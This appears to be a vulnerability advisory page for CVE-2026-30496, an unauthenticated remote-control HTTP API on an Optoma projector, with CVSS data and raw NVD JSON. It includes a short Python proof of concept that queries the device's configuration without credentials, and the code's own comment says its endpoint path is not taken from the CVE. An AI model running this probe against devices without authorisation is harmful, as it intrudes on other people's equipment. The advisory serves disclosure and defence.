Security Vulnerability Report
CVE-2026-30496 CVSS 9.8 CRITICAL

Published: 2026-05-07 14:16:02
Last Modified: 2026-05-08 23:16:35

Description

The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes an HTTP API on TCP port 2345 that allows full unauthenticated remote control of the device. The API supports both reading configuration (74 endpoints) and writing/modifying settings including volume, mute, brightness, power, network protocols enable/disable (including TELNET), display modes, and other projector functions. Any device on the same network can control the projector without authentication.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Optoma CinemaX P2 TVOS-04.24.010.04.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_exploit(target_ip):
    # Target port 2345 as described in the CVE.
    # The /api/config path comes from this PoC; the CVE description
    # does not name individual endpoints.
    url = f"http://{target_ip}:2345/api/config"
    try:
        # Send an unauthenticated request
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Target is vulnerable. Config data: {response.text[:100]}...")
            return True
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
    # Non-200 response or connection failure
    return False


if __name__ == "__main__":
    check_exploit("192.168.1.10")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30496", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:02.097", "lastModified": "2026-05-08T23:16:34.893", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes an HTTP API on TCP port 2345 that allows full unauthenticated remote control of the device. The API supports both reading configuration (74 endpoints) and writing/modifying settings including volume, mute, brightness, power, network protocols enable/disable (including TELNET), display modes, and other projector functions. Any device on the same network can control the projector without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://whitelabel.org/security/2026-02-01-smart-projector/", "source": "[email protected]"}]}}